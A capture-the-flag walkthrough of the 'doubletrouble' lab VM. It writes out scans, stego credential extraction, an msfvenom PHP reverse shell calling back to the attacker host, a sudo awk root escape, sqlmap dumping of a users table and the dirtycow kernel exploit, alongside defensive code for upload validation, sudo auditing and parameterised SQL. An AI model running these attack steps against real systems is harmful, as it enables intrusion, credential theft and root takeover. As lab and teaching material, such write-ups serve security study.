1. After installing the doubletrouble target VM, the screen looks like this: (kali: 192.168.0.104; target: 192.168.0.110)
It is Debian; nothing obviously useful is shown.
2. Port scan
$ nmap -Pn 192.168.0.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-26 03:48 EST
Nmap scan report for 192.168.0.110
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
ssh and http are open.
3. Directory scan
$ dirb http://192.168.0.110 -X .php,.txt,.zip
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 03:52:00 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.php,.txt) | (.zip)(.php)(.txt) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
+ http://192.168.0.110/check.php (CODE:200|SIZE:0)
+ http://192.168.0.110/index.php (CODE:200|SIZE:5812)
+ http://192.168.0.110/readme.txt (CODE:200|SIZE:470)
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:26)
-----------------
END_TIME: Wed Jan 26 03:52:02 2022
DOWNLOADED: 13836 - FOUND: 4
Found check.php, index.php, robots.txt and readme.txt.
Only index.php is useful.
Scan the whole site again:
$ dirb http://192.168.0.110
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 03:57:04 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
==> DIRECTORY: http://192.168.0.110/backups/
==> DIRECTORY: http://192.168.0.110/batch/
==> DIRECTORY: http://192.168.0.110/core/
==> DIRECTORY: http://192.168.0.110/css/
+ http://192.168.0.110/favicon.ico (CODE:200|SIZE:894)
==> DIRECTORY: http://192.168.0.110/images/
+ http://192.168.0.110/index.php (CODE:200|SIZE:5812)
==> DIRECTORY: http://192.168.0.110/install/
==> DIRECTORY: http://192.168.0.110/js/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.0.110/secret/
+ http://192.168.0.110/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.0.110/sf/
==> DIRECTORY: http://192.168.0.110/template/
==> DIRECTORY: http://192.168.0.110/uploads/
---- Entering directory: http://192.168.0.110/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/batch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/ ----
==> DIRECTORY: http://192.168.0.110/install/actions/
==> DIRECTORY: http://192.168.0.110/install/css/
==> DIRECTORY: http://192.168.0.110/install/images/
+ http://192.168.0.110/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.0.110/install/lib/
==> DIRECTORY: http://192.168.0.110/install/modules/
---- Entering directory: http://192.168.0.110/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/secret/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/sf/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/template/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/actions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jan 26 03:57:06 2022
DOWNLOADED: 9224 - FOUND: 5
Visiting http://192.168.0.110 shows the following page:
Visiting http://192.168.0.110/secret reveals an image.
Visiting http://192.168.0.110/uploads reveals a browsable directory of uploaded files (this suggests uploading a PHP reverse shell, which presumably requires logging into "qdPM" first).
The other pages contain nothing important.
4. Start with the image; it may contain hidden information.
Use the stegseek tool to look for hidden data in the image: https://github.com/RickdeJager/stegseek
$ stegseek ./doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
Presumably these are the qdPM username and password.
5. Try logging in; the login succeeds. Now look for a file-upload entry point.
Eventually: click the avatar in the top-right corner and choose "my details"; the page looks like this:
Upload a file via "choose file" and "save".
6. Use msfvenom to generate the PHP reverse-shell code (reference: "Msfvenom命令总结大全", 卿's Blog on CSDN)
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.104 LPORT=9000 -o 9000.php
Remember to open the PHP file and delete the leading "/*"! Then upload the file.
7. Visit http://192.168.0.110/uploads/users in the browser
The date column shows the upload succeeded.
8. Listen on a local port with msfconsole (I used port 9000)
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 192.168.0.104
msf6 exploit(multi/handler) > set lport 9000
msf6 exploit(multi/handler) > run
9. Visit http://192.168.0.110/uploads/users and click the uploaded 9000.php to trigger the reverse connection.
Connection established.
meterpreter > shell
Process 871 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
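The foothold above exists because the qdPM "my details" avatar upload accepted a .php file and stored it under a web-served, listable /uploads/users directory. As an added example (not code from the write-up or from qdPM), this is the server-side validation such an upload handler should apply; the function names and the allowed-type table are my own:

```python
import os
import secrets

# Allowed avatar types: the extension and the file's leading bytes must agree.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

class UploadRejected(Exception):
    """Raised for any upload that is not a plain image of an allowed type."""

def validate_avatar(filename, data):
    """Return the canonical extension for an acceptable avatar, else raise UploadRejected."""
    base = os.path.basename(filename)          # ignore any directory part of the name
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    # Allowlist on the LAST extension: '9000.php' and 'x.phtml' stop here.
    if ext not in ALLOWED_MAGIC:
        raise UploadRejected(f".{ext} is not an image extension")
    # 'shell.php.jpg' passes the extension test, so the content is checked too.
    if not data.startswith(ALLOWED_MAGIC[ext]):
        raise UploadRejected("content does not match the declared image type")
    # Defence in depth against image/PHP polyglots: a real avatar has no PHP open tag.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("PHP open tag inside image data")
    return "jpg" if ext == "jpeg" else ext

def stored_name(filename, data):
    """Server-chosen random file name; the client's name never reaches the disk."""
    ext = validate_avatar(filename, data)
    return f"{secrets.token_hex(16)}.{ext}"
```

The check is only half of the fix: the upload directory must also be served with script execution and directory indexing disabled (or kept outside the web root), otherwise a server that still runs .php from /uploads is one bypass away.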
10. Privilege escalation (reference: "Linux 提权的各种姿势总结", weixin_45116657's blog on CSDN)
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
awk can be run via sudo without a password.
sudo awk 'BEGIN {system("/bin/sh")}'
whoami
root
cd /root
ls -l
total 403460
-rw-r--r-- 1 root root 413142528 Sep 11 10:49 doubletrouble.ova
Sure enough, "double trouble": there is another target VM inside.
11. Download the VM and open it in VirtualBox
In the target's shell, run:
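The root shell came from a single sudoers line: a NOPASSWD rule for a program that can spawn a shell. As an added example (not part of the write-up), this audit parses `sudo -l` output of the shape shown above and flags such rules; the sample text is constructed to mirror the output on this page, and the list of shell-capable binaries is a small hand-picked set, not an exhaustive one:

```python
import re

# Constructed sample, same layout as the `sudo -l` output in the write-up,
# plus one harmless rule to show what is not flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl restart apache2
"""

# Programs that can run arbitrary commands once started as root (extend for your hosts).
SHELL_CAPABLE = {"awk", "gawk", "mawk", "nawk", "sh", "bash", "perl", "python3"}

# "(runas) TAG: TAG: command" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_rules(text):
    """Return [(runas, tags, command)] for every command rule in `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        if not in_rules:
            continue                 # skip the Defaults block
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules

def risky_rules(text):
    """Commands that run a shell-capable program as root (or ALL) with no password."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]          # /usr/bin/awk -> awk
        root_capable = runas.split(":")[0].strip() in ("ALL", "root")
        if "NOPASSWD" in tags and root_capable and binary in SHELL_CAPABLE:
            findings.append(cmd)
    return findings
```

The remediation is to remove the rule or replace it with a dedicated wrapper script that takes no user-controlled arguments; sudo cannot confine what awk does once it is running as root.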
python3 -m http.server 8888
On Kali, run:
$ wget http://192.168.0.110:8888/doubletrouble.ova
Then the first VM can be shut down.
12. Start the second target VM; the screen looks like this (kali: 192.168.0.104; target: 192.168.0.111)
13. Port scan
$ nmap -Pn 192.168.0.111
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-26 05:54 EST
Nmap scan report for 192.168.0.111
Host is up (0.000076s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
Then a directory scan:
$ dirb http://192.168.0.111
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 05:50:23 2022
URL_BASE: http://192.168.0.111/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.111/ ----
+ http://192.168.0.111/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.0.111/index.php (CODE:200|SIZE:615)
+ http://192.168.0.111/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Wed Jan 26 05:50:24 2022
DOWNLOADED: 4612 - FOUND: 3
Only index.php is useful (the other responses are 403).
14. Visit http://192.168.0.111
It asks us to log in, which again brings the database to mind.
15. Database scan
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms --current-db
...(answer yes to all prompts)
current database: 'doubletrouble'
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble --tables
...(answer yes to all prompts)
Database: doubletrouble
[1 table]
+-------+
| users |
+-------+
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble -T users --columns
...(answer yes to all prompts)
Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble -T users --dump
...(answer yes to all prompts)
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+
...
Two username/password pairs were found. Testing shows neither logs into the web app; trying them over ssh, only the clapton account works.
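sqlmap could dump the users table because the login form splices its fields straight into SQL. The target's real index.php is not shown, so as an added example (not the page's code) here is that query shape beside the parameterised version, run against an in-memory copy of the dumped table; the probe function reproduces the single-quote symptom that form scanning keys on:

```python
import sqlite3

def make_db():
    """In-memory stand-in for the `doubletrouble.users` table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username VARCHAR(255), password VARCHAR(255))")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("montreux", "GfsZxc1"), ("clapton", "ZubZub99")])
    return db

def login_vulnerable(db, username, password):
    """Input spliced into the SQL text: a quote in the input becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_safe(db, username, password):
    """Bound parameters: values travel separately from the query, never as syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def reacts_to_quote(db, login):
    """True if a lone quote in the username turns into a database error, which is
    the symptom sqlmap's form probing looks for on a page like index.php."""
    try:
        login(db, "o'reilly", "x")
    except sqlite3.Error:
        return True
    return False
```

The dump also shows passwords stored in clear text, so the second fix is to store only a salted password hash; then even a successful dump yields nothing that logs in over ssh.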
$ ssh clapton@192.168.0.111
clapton@192.168.0.111's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 26 02:12:00 2022 from 192.168.0.104
clapton@doubletrouble:~$ whoami
clapton
clapton@doubletrouble:~$ id
uid=1000(clapton) gid=1000(clapton) groups=1000(clapton)
clapton@doubletrouble:~$ uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
With the kernel version known, search for an exploitable vulnerability to escalate privileges.
16. Local privilege escalation
The search indeed turns up a vulnerability: GitHub - FireFart/dirtycow
Download the C file locally, then in the target shell create a new C file, paste the contents in, and compile it:
clapton@doubletrouble:~$ gcc ./dirty.c -o dirtycow
Run it:
clapton@doubletrouble:~$ chmod +x dirtycow
clapton@doubletrouble:~$ ./dirtycow 123456
17. This program creates a new root user named firefart
clapton@doubletrouble:~$ su firefart
Password:
firefart@doubletrouble:/home/clapton# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:/home/clapton# whoami
firefart
Or close the window and reconnect over ssh:
$ ssh firefart@192.168.0.111
firefart@192.168.0.111's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 26 02:38:26 2022
firefart@doubletrouble:~# whoami
firefart
firefart@doubletrouble:~# id
uid=0(firefart) gid=0(root) groups=0(root)
18. Done.